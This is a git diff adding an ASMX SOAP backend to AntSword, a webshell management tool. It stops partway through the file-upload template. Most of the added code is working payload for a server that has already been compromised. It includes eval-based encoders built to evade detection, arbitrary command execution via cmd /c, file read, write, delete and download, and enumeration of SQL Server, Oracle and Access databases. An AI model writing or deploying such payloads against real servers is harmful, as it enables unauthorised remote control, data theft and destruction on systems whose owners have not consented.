diff --git a/source/app.entry.js b/source/app.entry.js
index ba27f888..350d0a6b 100644
--- a/source/app.entry.js
+++ b/source/app.entry.js
@@ -168,7 +168,7 @@ const antSword = window.antSword = {
 };
 
 //核心模块类型列表
-antSword['core_types'] = ['asp', 'aspx', 'aspxcsharp', 'php', 'php4', 'phpraw', 'jsp', 'jspjs', 'cmdlinux', 'pswindows', 'custom'];
+antSword['core_types'] = ['asp', 'aspx', 'asmx', 'aspxcsharp', 'php', 'php4', 'phpraw', 'jsp', 'jspjs', 'cmdlinux', 'pswindows', 'custom'];
 
 // 加载核心模板
 antSword['core'] = require('./core/');
diff --git a/source/core/asmx/decoder/default.js b/source/core/asmx/decoder/default.js
new file mode 100644
index 00000000..b942e3f5
--- /dev/null
+++ b/source/core/asmx/decoder/default.js
@@ -0,0 +1,14 @@
+/**
+ * aspx::default解码器
+ */
+
+'use strict';
+
+module.exports = {
+  asoutput: () => {
+    return ``.replace(/\n\s+/g, '');
+  },
+  decode_buff: (buff) => {
+    return buff;
+  }
+}
\ No newline at end of file
diff --git a/source/core/asmx/encoder/base64.js b/source/core/asmx/encoder/base64.js
new file mode 100644
index 00000000..9e790552
--- /dev/null
+++ b/source/core/asmx/encoder/base64.js
@@ -0,0 +1,22 @@
+//
+// aspx::base64 编码模块
+//
+// :把除了密码的其他参数都base64编码一次
+//
+
+'use strict';
+
+module.exports = (pwd, data, ext = null) => {
+  let randomID;
+  if (ext.opts.otherConf['use-random-variable'] === 1) {
+    randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
+  } else {
+    randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
+  }
+  data[randomID] = Buffer
+    .from(data['_'])
+    .toString('base64');
+  data[pwd] = `eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(Request.Item["${randomID}"])),"unsafe");`;
+  delete data['_'];
+  return data;
+}
\ No newline at end of file
diff --git a/source/core/asmx/encoder/hex.js b/source/core/asmx/encoder/hex.js
new file mode 100644
index 00000000..6ab885e2
--- /dev/null
+++ b/source/core/asmx/encoder/hex.js
@@ -0,0 +1,26 @@
+//
+// aspx::hex 编码模块
+//
+// 把除了密码的其他参数都 hex 编码一次
+//
+
+'use strict';
+
+module.exports = (pwd, data, ext = null) => {
+    let randomID;
+    if (ext.opts.otherConf['use-random-variable'] === 1) {
+        randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
+    } else {
+        randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
+    }
+    let hexencoder = "function HexAsciiConvert(hex:String) {var sb:System.Text.StringBuilder = new Sys" +
+        "tem.Text.StringBuilder();var i;for(i=0; i< hex.Length; i+=2){sb.Append(System.Co" +
+        "nvert.ToString(System.Convert.ToChar(Int32.Parse(hex.Substring(i,2), System.Glob" +
+        "alization.NumberStyles.HexNumber))));}return sb.ToString();};";
+    data[randomID] = Buffer
+        .from(data['_'])
+        .toString('hex');
+    data[pwd] = `${hexencoder};eval(HexAsciiConvert(Request.Item["${randomID}"]),"unsafe");`;
+    delete data['_'];
+    return data;
+}
\ No newline at end of file
diff --git a/source/core/asmx/encoder/url_unicode.js b/source/core/asmx/encoder/url_unicode.js
new file mode 100644
index 00000000..43af23d5
--- /dev/null
+++ b/source/core/asmx/encoder/url_unicode.js
@@ -0,0 +1,41 @@
+/**
+ * aspx::url_unicode 编码器
+ * 把字符转成 %uXXXX 形式
+ * eg: Re => %u0052%u0065
+ * Create at: 2023/09/07
+ */
+
+'use strict';
+
+function char2unicode(c) {
+  if (c.length != 1) {
+    return '';
+  }
+  let buff = Buffer.alloc(4, '0');
+  let hexstr = c
+    .charCodeAt()
+    .toString(16);
+  buff.write(hexstr, buff.length - hexstr.length, hexstr.length);
+  return "\\u" + buff.toString();
+}
+
+function string2unicode(str) {
+  var ret = "";
+  for (var i = 0; i < str.length; i++) {
+    ret += char2unicode(str[i]);
+  }
+  return ret;
+}
+
+/*
+ * @param  {String} pwd   连接密码
+ * @param  {Array}  data  编码器处理前的 payload 数组
+ * @return {Array}  data  编码器处理后的 payload 数组
+ */
+module.exports = (pwd, data, ext = {}) => {
+  data[pwd] = string2unicode(data['_']).replace(/\\u/g, 'asunescape(%)u');
+  // 删除 _ 原有的payload
+  delete data['_'];
+  // 返回编码器处理后的 payload 数组
+  return data;
+}
diff --git a/source/core/asmx/index.js b/source/core/asmx/index.js
new file mode 100644
index 00000000..35fd08af
--- /dev/null
+++ b/source/core/asmx/index.js
@@ -0,0 +1,104 @@
+/**
+ * ASMX服务端脚本模板
+ * 开写：2023/09/07
+ * 更新：-
+ * 作者：BaoGuo <https://github.com/ba0gu0>
+ */
+'use strict';
+
+// import Base from '../base';
+const Base = require('../base');
+
+class ASMX extends Base {
+  constructor(opts) {
+    opts['otherConf']['use-raw-body'] = 1
+    opts['httpConf']['headers']['content-type'] = 'text/xml; charset=utf-8'
+
+    super(opts);
+    // 解析模板
+    [
+      'base',
+      'command',
+      'filemanager',
+      'database/dsn',
+      'database/mysql',
+      'database/access',
+      'database/oracle',
+      'database/sqlserver',
+      'database/sqloledb_1',
+      'database/sqloledb_1_sspi',
+      'database/microsoft_jet_oledb_4_0'
+    ].map((_) => {
+      this.parseTemplate(`./asmx/template/${_}`);
+    });
+    // 解析编码器
+    this
+      .encoders
+      .map((_) => {
+        this.parseEncoder(`./asmx/encoder/${_}`);
+      });
+    this
+      .decoders
+      .map((_) => {
+        this.parseDecoder(`./asmx/decoder/${_}`);
+      });
+  }
+
+  /**
+   * 获取编码器列表
+   * @return {array} 编码器列表
+   */
+  get encoders() {
+    return ["base64", "hex", "url_unicode"];
+  }
+
+  get decoders() {
+    return ["default"];
+  }
+
+  /**
+   * HTTP请求数据组合函数
+   * @param  {Object} data 通过模板解析后的代码对象
+   * @return {Promise}     返回一个Promise操作对象
+   */
+  complete(data, force_default = false) {
+    // 分隔符号
+    let tag_s, tag_e;
+    if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tags']) {
+      tag_s = this.__opts__['otherConf']['custom-datatag-tags'];
+    } else {
+      tag_s = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "->|";
+    }
+    if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tage']) {
+      tag_e = this.__opts__['otherConf']['custom-datatag-tage'];
+    } else {
+      tag_e = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "|<-";
+    }
+
+    // let formatter = new this.format(this.__opts__['encode']);
+    let formatter = Base
+      .prototype
+      .format(this.__opts__);
+
+    let aspxencode = this.__opts__['encode'];
+
+    switch (this.__opts__['encode']) {
+      case "UTF8":
+        aspxencode = "UTF-8";
+        break;
+      default:
+        break;
+    }
+    // 替换代码中的 GetEncoding("!{ANT::ENDOCE}").GetString 的 tag
+    data['_'] = data['_'].replace(/!{ANT::ENDOCE}/g, aspxencode);
+    // base64编码一次数据
+    let base64Code = formatter['base64'](data['_']);
+
+    data['_'] = `<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><Invoke xmlns="http://tempuri.org/"><${this.__opts__['pwd']}>Response.Write("${tag_s.substr(0,tag_s.length/2)}"+"${tag_s.substr(tag_s.length/2)}");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("${aspxencode}").GetString(System.Convert.FromBase64String("${base64Code}")),"unsafe");}catch(err){Response.Write("ERROR:// "+err.message);}Response.Write("${tag_e.substr(0,tag_e.length/2)}"+"${tag_e.substr(tag_e.length/2)}");Response.End();</${this.__opts__['pwd']}></Invoke></soap:Body></soap:Envelope>`;
+
+    // 使用编码器进行处理并返回
+    return this.encodeComplete(tag_s, tag_e, data);
+  }
+}
+
+module.exports = ASMX;
diff --git a/source/core/asmx/template/base.js b/source/core/asmx/template/base.js
new file mode 100644
index 00000000..98ef7065
--- /dev/null
+++ b/source/core/asmx/template/base.js
@@ -0,0 +1,17 @@
+/**
+ * 基础信息模板
+ * ? 获取当前路径、盘符列表
+ */
+
+module.exports = () => ({
+  info: {
+    _: `var c=System.IO.Directory.GetLogicalDrives();Response.Write(Server.MapPath(".")+"\t");for(var i=0;i<=c.length-1;i++)Response.Write(c[i][0]+":");Response.Write("\t"+Environment.OSVersion+"\t");Response.Write(Environment.UserName);`
+  },
+  probedb: { // 检测数据库函数支持
+    _: `function fe(S:String){try{new ActiveXObject(S);return 1;}catch(Exception){return 0;}};
+    var n="Adodb.Connection|Adodb.RecordSet";
+    n=n.Split("|");
+    for(var i=0;i<n.length;i++)Response.Write(n[i]+"\\t"+fe(n[i])+"\\n");
+    `.replace(/\n\s+/g, '')
+  }
+})
\ No newline at end of file
diff --git a/source/core/asmx/template/command.js b/source/core/asmx/template/command.js
new file mode 100644
index 00000000..36e02181
--- /dev/null
+++ b/source/core/asmx/template/command.js
@@ -0,0 +1,41 @@
+/**
+ * 命令执行模板
+ */
+
+module.exports = (arg1, arg2, arg3) => ({
+  exec: {
+    _: `var c=new System.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::bin}".substr(#randomPrefix#))));
+    var e=new System.Diagnostics.Process();
+    var out:System.IO.StreamReader,EI:System.IO.StreamReader;
+    c.UseShellExecute=false;
+    c.RedirectStandardOutput=true;
+    c.RedirectStandardError=true;
+    e.StartInfo=c;
+    c.Arguments="/c "+System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::cmd}".substr(#randomPrefix#)));
+    if("#{newbase64::env}".substr(#randomPrefix#)) {
+      var envstr = System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::env}".substr(#randomPrefix#)));
+      var envarr = envstr.split("|||asline|||");
+      var i;
+      for (var i in envarr) {
+        var ss = envarr[i].split("|||askey|||");
+        if (ss.length != 2) {
+          continue;
+        }
+        c.EnvironmentVariables.Add(ss[0],ss[1]);
+      }
+    }
+    e.Start();
+    out=e.StandardOutput;
+    EI=e.StandardError;
+    e.Close();
+    Response.Write(out.ReadToEnd() + EI.ReadToEnd());`.replace(/\n\s+/g, ''),
+  },
+  listcmd: {
+    _: `var binarr=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::binarr}".substr(#randomPrefix#)));
+      var ss=binarr.split(",");
+      var i;
+      for(var i in ss){
+        Response.Write(ss[i]+"\\t"+(System.IO.File.Exists(ss[i])?1:0)+"\\n");
+      }`.replace(/\n\s+/g, ''),
+  }
+})
diff --git a/source/core/asmx/template/database/access.js b/source/core/asmx/template/database/access.js
new file mode 100644
index 00000000..1392b7e7
--- /dev/null
+++ b/source/core/asmx/template/database/access.js
@@ -0,0 +1,22 @@
+/**
+ * access数据库驱动代码模板
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));Response.Write("#{dbname}"+"\\t");Conn.Close();`,
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"));Conn.ConnectionTimeout=10;Conn.Open();var Rs=Conn.OpenSchema(20);var x:String="";while(!Rs.EOF && !Rs.BOF){if(Rs.Fields(3).Value=="TABLE"){x+=Rs.Fields(2).Value+"\\t";}Rs.MoveNext();}Rs.Close();Conn.Close();Response.Write(x);`,
+  },
+  // 显示表字段
+  show_columns: {
+    _: `function TN(n:Int32):String{switch(n){case 2:return "smallint";case 3:return "int";case 4:return "real";case 5:return "float";case 6:return "money";case 7:return "datetime";case 11:return "bit";case 12:return "variant";case 16:return "tinyint";case 17:return "tinyint";case 20:return "bigint";case 72:return "unique";case 128:return "binary";case 129:return "char";case 130:return "nchar";case 131:return "numeric";case 135:return "datetime";case 200:return "varchar";case 201:return "text";case 202:return "nvarchar";case 203:return "ntext";case 204:return "varbinary";case 205:return "image";default:return n;}}var Conn=new ActiveXObject("Adodb.connection");Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));var Rs=new ActiveXObject("ADODB.Recordset");Rs.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::table}")),Conn,1,1);var c:Int32;for(c=0;c<=Rs.Fields.Count-1;c++){Response.Write(Rs.Fields.Item(c).Name+" ("+TN(Rs.Fields.Item(c).Type)+")\\t");}Rs.Close();Conn.Close();`,
+  },
+  // 执行SQL语句
+  query: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");var strSQL:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::sql}"));Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"));Conn.ConnectionTimeout=10;Conn.Open();var CO:String="\\t|\\t",RN:String="\\r\\n",Dat:String;var Rs=Conn.Execute(strSQL);var i:Int32=Rs.Fields.Count,c:Int32;for(c=0;c<i;c++){Response.Write(Rs.Fields(c).Name+CO);}Response.Write(RN);while(!Rs.EOF && !Rs.BOF){for(c=0;c<i;c++){Dat=Rs.Fields(c).Value;Response.Write(Dat);Response.Write(CO);}Response.Write(RN);Rs.MoveNext();}Conn.Close();`,
+  }
+})
diff --git a/source/core/asmx/template/database/default.js b/source/core/asmx/template/database/default.js
new file mode 100644
index 00000000..ff3f9d62
--- /dev/null
+++ b/source/core/asmx/template/database/default.js
@@ -0,0 +1,22 @@
+/**
+ * 默认数据库操作代码模板
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));Response.Write("[ADO DATABASE]\\t");Conn.Close();`,
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"));Conn.ConnectionTimeout=10;Conn.Open();var Rs=Conn.OpenSchema(20);var x:String="";while(!Rs.EOF && !Rs.BOF){if(Rs.Fields(3).Value=="TABLE"){x+=Rs.Fields(2).Value+"\\t";}Rs.MoveNext();}Rs.Close();Conn.Close();Response.Write(x);`,
+  },
+  // 显示表字段
+  show_columns: {
+    _: `function TN(n:Int32):String{switch(n){case 2:return "smallint";case 3:return "int";case 4:return "real";case 5:return "float";case 6:return "money";case 7:return "datetime";case 11:return "bit";case 12:return "variant";case 16:return "tinyint";case 17:return "tinyint";case 20:return "bigint";case 72:return "unique";case 128:return "binary";case 129:return "char";case 130:return "nchar";case 131:return "numeric";case 135:return "datetime";case 200:return "varchar";case 201:return "text";case 202:return "nvarchar";case 203:return "ntext";case 204:return "varbinary";case 205:return "image";default:return n;}}var Conn=new ActiveXObject("Adodb.connection");Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));var Rs=new ActiveXObject("ADODB.Recordset");Rs.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::table}")),Conn,1,1);var c:Int32;for(c=0;c<=Rs.Fields.Count-1;c++){Response.Write(Rs.Fields.Item(c).Name+" ("+TN(Rs.Fields.Item(c).Type)+")\\t");}Rs.Close();Conn.Close();`,
+  },
+  // 执行SQL语句
+  query: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");var strSQL:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::sql}"));Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"));Conn.ConnectionTimeout=10;Conn.Open();var CO:String="\\t|\\t",RN:String="\\r\\n",Dat:String;var Rs=Conn.Execute(strSQL);var i:Int32=Rs.Fields.Count,c:Int32;for(c=0;c<i;c++){Response.Write(Rs.Fields(c).Name+CO);}Response.Write(RN);while(!Rs.EOF && !Rs.BOF){for(c=0;c<i;c++){Dat=Rs.Fields(c).Value;Response.Write(Dat);Response.Write(CO);}Response.Write(RN);Rs.MoveNext();}Conn.Close();`,
+  }
+})
diff --git a/source/core/asmx/template/database/dsn.js b/source/core/asmx/template/database/dsn.js
new file mode 100644
index 00000000..ad10af6c
--- /dev/null
+++ b/source/core/asmx/template/database/dsn.js
@@ -0,0 +1,5 @@
+//
+// ASPX::DNS数据库驱动代码模板
+//
+
+module.exports = require('./default');
\ No newline at end of file
diff --git a/source/core/asmx/template/database/microsoft_jet_oledb_4_0.js b/source/core/asmx/template/database/microsoft_jet_oledb_4_0.js
new file mode 100644
index 00000000..a9263a85
--- /dev/null
+++ b/source/core/asmx/template/database/microsoft_jet_oledb_4_0.js
@@ -0,0 +1,5 @@
+//
+// ASPX::microsoft_jet_oledb_4_0数据库驱动代码模板
+//
+
+module.exports = require('./access');
\ No newline at end of file
diff --git a/source/core/asmx/template/database/mysql.js b/source/core/asmx/template/database/mysql.js
new file mode 100644
index 00000000..27441710
--- /dev/null
+++ b/source/core/asmx/template/database/mysql.js
@@ -0,0 +1,5 @@
+// 
+// ASPX::mysql数据库驱动代码模板
+// 
+
+module.exports = require('./default');
\ No newline at end of file
diff --git a/source/core/asmx/template/database/oracle.js b/source/core/asmx/template/database/oracle.js
new file mode 100644
index 00000000..e35bc501
--- /dev/null
+++ b/source/core/asmx/template/database/oracle.js
@@ -0,0 +1,79 @@
+/**
+ * ASPX::oracle数据库驱动代码模板
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");
+      Conn.ConnectionTimeout=10;
+      Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));
+      var Rs=new ActiveXObject("ADODB.Recordset");
+      Rs.Open("SELECT USERNAME FROM ALL_USERS ORDER BY 1",Conn,1,1);
+      while(!Rs.EOF && !Rs.BOF){
+        Response.Write(Rs.Fields(0).Value+"\\t");
+        Rs.MoveNext();
+      }
+      Rs.Close();
+      Conn.Close();`.replace(/\n\s+/g, ''),
+    // Provider=OraOLEDB.Oracle;Data Source=test;User Id=sys;Password=;Persist
+    // Security Info=True;
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");
+      Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"));
+      Conn.ConnectionTimeout=10;
+      Conn.Open();
+      var Rs=new ActiveXObject("ADODB.Recordset");
+      Rs.Open("SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='"+"#{dbname}"+"' ORDER BY 1)",Conn,1,1);
+      while(!Rs.EOF && !Rs.BOF){
+        Response.Write(Rs.Fields(0).Value+"\\t");
+        Rs.MoveNext();
+      }
+      Rs.Close();
+      Conn.Close();`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");
+      Conn.ConnectionTimeout=10;
+      Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));
+      var Rs=new ActiveXObject("ADODB.Recordset");
+      Rs.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::table}")),Conn,1,1);
+      var CO:String="\\t";
+      var i:Int32=Rs.Fields.Count,c:Int32;
+      while(!Rs.EOF && !Rs.BOF){
+        Response.Write(Rs.Fields(0).Value+" ("+Rs.Fields(1).Value+"("+Rs.Fields(2).Value+"))");
+        Response.Write(CO);
+        Rs.MoveNext();
+      }
+      Rs.Close();
+      Conn.Close();`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");
+      var strSQL:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::sql}"));
+      Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"));
+      Conn.ConnectionTimeout=10;
+      Conn.Open();
+      var CO:String="\\t|\\t",RN:String="\\r\\n",Dat:String;
+      var Rs=Conn.Execute(strSQL);
+      var i:Int32=Rs.Fields.Count,c:Int32;
+      for(c=0;c<i;c++){
+        Response.Write(Rs.Fields(c).Name+CO);
+      }
+      Response.Write(RN);
+      while(!Rs.EOF && !Rs.BOF){
+        for(c=0;c<i;c++){
+          Dat=Rs.Fields(c).Value;
+          Response.Write(Dat);
+          Response.Write(CO);
+        }
+        Response.Write(RN);
+        Rs.MoveNext();
+      }
+      Conn.Close();`.replace(/\n\s+/g, ''),
+  }
+})
diff --git a/source/core/asmx/template/database/sqloledb_1.js b/source/core/asmx/template/database/sqloledb_1.js
new file mode 100644
index 00000000..50f66dac
--- /dev/null
+++ b/source/core/asmx/template/database/sqloledb_1.js
@@ -0,0 +1,5 @@
+// 
+// ASPX::sqloledb_1数据库驱动代码模板
+// 
+
+module.exports = require('./default');
\ No newline at end of file
diff --git a/source/core/asmx/template/database/sqloledb_1_sspi.js b/source/core/asmx/template/database/sqloledb_1_sspi.js
new file mode 100644
index 00000000..93701722
--- /dev/null
+++ b/source/core/asmx/template/database/sqloledb_1_sspi.js
@@ -0,0 +1,5 @@
+// 
+// ASPX::sqloledb_1_sspi数据库驱动代码模板
+// 
+
+module.exports = require('./default');
\ No newline at end of file
diff --git a/source/core/asmx/template/database/sqlserver.js b/source/core/asmx/template/database/sqlserver.js
new file mode 100644
index 00000000..3ea5c168
--- /dev/null
+++ b/source/core/asmx/template/database/sqlserver.js
@@ -0,0 +1,73 @@
+/**
+ * ASPX::sqlserver数据库驱动代码模板
+ */
+
+module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
+  // 显示所有数据库
+  show_databases: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");
+      Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));
+      var Rs=new ActiveXObject("ADODB.Recordset");
+      Rs.Open("SELECT [name] FROM master.dbo.sysdatabases ORDER BY 1",Conn,1,1);
+      while(!Rs.EOF && !Rs.BOF){
+        Response.Write(Rs.Fields(0).Value+"\\t");
+        Rs.MoveNext();
+      }
+      Rs.Close();
+      Conn.Close();`.replace(/\n\s+/g, ''),
+  },
+  // 显示数据库所有表
+  show_tables: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");
+      Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));
+      var Rs=new ActiveXObject("ADODB.Recordset");
+      Rs.Open("USE ["+"#{dbname}"+"];
+      SELECT [name] FROM sysobjects WHERE (xtype=\'U\') ORDER BY 1",Conn,1,1);
+      while(!Rs.EOF && !Rs.BOF){
+        Response.Write(Rs.Fields(0).Value+"\\t");
+        Rs.MoveNext();
+      }
+      Rs.Close();
+      Conn.Close();`.replace(/\n\s+/g, ''),
+  },
+  // 显示表字段
+  show_columns: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");
+      Conn.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}")));
+      var Rs=new ActiveXObject("ADODB.Recordset");
+      Rs.Open(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::table}")),Conn,1,1);
+      var CO:String="\\t";
+      var i:Int32=Rs.Fields.Count,c:Int32;
+      for(c=0;c<i;c++){
+        Response.Write(Rs.Fields(c).Name+CO)
+      }
+      Rs.Close();
+      Conn.Close();`.replace(/\n\s+/g, ''),
+  },
+  // 执行SQL语句
+  query: {
+    _: `var Conn=new ActiveXObject("Adodb.connection");
+      var strSQL:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::sql}"));
+      Conn.ConnectionString=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{base64::conn}"));
+      Conn.ConnectionTimeout=10;
+      Conn.Open();
+      var CO:String="\\t|\\t",RN:String="\\r\\n",Dat:String;
+      Conn.DefaultDatabase="#{dbname}";
+      var Rs=Conn.Execute(strSQL);
+      var i:Int32=Rs.Fields.Count,c:Int32;
+      for(c=0;c<i;c++){
+        Response.Write(Rs.Fields(c).Name+CO);
+      }
+      Response.Write(RN);
+      while(!Rs.EOF && !Rs.BOF){
+        for(c=0;c<i;c++){
+          Dat=Rs.Fields(c).Value;
+          Response.Write(Dat);
+          Response.Write(CO);
+        }
+        Response.Write(RN);
+        Rs.MoveNext();
+      }
+      Conn.Close();`.replace(/\n\s+/g, ''),
+  }
+})
diff --git a/source/core/asmx/template/filemanager.js b/source/core/asmx/template/filemanager.js
new file mode 100644
index 00000000..ed7b5b99
--- /dev/null
+++ b/source/core/asmx/template/filemanager.js
@@ -0,0 +1,63 @@
+/**
+ * 文件管理模板
+ */
+
+module.exports = (arg1, arg2, arg3) => ({
+  dir: {
+    _: `var D=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));var m=new System.IO.DirectoryInfo(D);var s=m.GetDirectories();var P:String;var i;function T(p:String):String{return System.IO.File.GetLastWriteTime(p).ToString("yyyy-MM-dd HH:mm:ss");}for(i in s){P=D+s[i].Name;Response.Write(s[i].Name+"/\\t"+T(P)+"\\t0\\t"+(s[i].Attributes)+"\\n");}s=m.GetFiles();for(i in s){P=D+s[i].Name;Response.Write(s[i].Name+"\\t"+T(P)+"\\t"+s[i].Length+"\\t"+(s[i].Attributes)+"\\n");}`,
+  },
+
+  delete: {
+    _: `var P:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));if(System.IO.Directory.Exists(P)){System.IO.Directory.Delete(P,true);}else{System.IO.File.Delete(P);}Response.Write("1");`,
+  },
+
+  create_file: {
+    _: `var P:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));var m=new System.IO.StreamWriter(P,false,Encoding.Default);m.Write(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::content}".substr(#randomPrefix#))));m.Close();Response.Write("1");`,
+  },
+
+  read_file: {
+    _: `var P:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));var m=new System.IO.StreamReader(P,Encoding.Default);Response.Write(m.ReadToEnd());m.Close();`,
+  },
+
+  copy: {
+    _: `var S=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));var D=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::target}".substr(#randomPrefix#)));function cp(S:String,D:String){if(System.IO.Directory.Exists(S)){var m=new System.IO.DirectoryInfo(S);var i;var f=m.GetFiles();var d=m.GetDirectories();System.IO.Directory.CreateDirectory(D);for (i in f)System.IO.File.Copy(S+"\\\\"+f[i].Name,D+"\\\\"+f[i].Name);for (i in d)cp(S+"\\\\"+d[i].Name,D+"\\\\"+d[i].Name);}else{System.IO.File.Copy(S,D);}}cp(S,D);Response.Write("1");`,
+  },
+
+  download_file: {
+    _: `Response.WriteFile(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#))));`,
+  },
+
+  upload_file: {
+    _:
+    // `var
+    // P:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.C
+    // onvert.FromBase64String(Request.Item["${arg1}"].substr(#randomPrefix#)));var
+    // Z:String=Request.Item["${arg2}"].substr(#randomPrefix#);var B:byte[]=new byte[Z.Length/2];for(var
+    // i=0;i<Z.Length;i+=2){B[i/2]=byte(Convert.ToInt32(Z.Substring(i,2),16));}var
+    // fs:System.IO.FileStream=new
+    // System.IO.FileStream(P,System.IO.FileMode.Create);fs.Write(B,0,B.Length);fs.Cl
+    // ose();Response.Write("1");`, 修改写入模式Create->Append
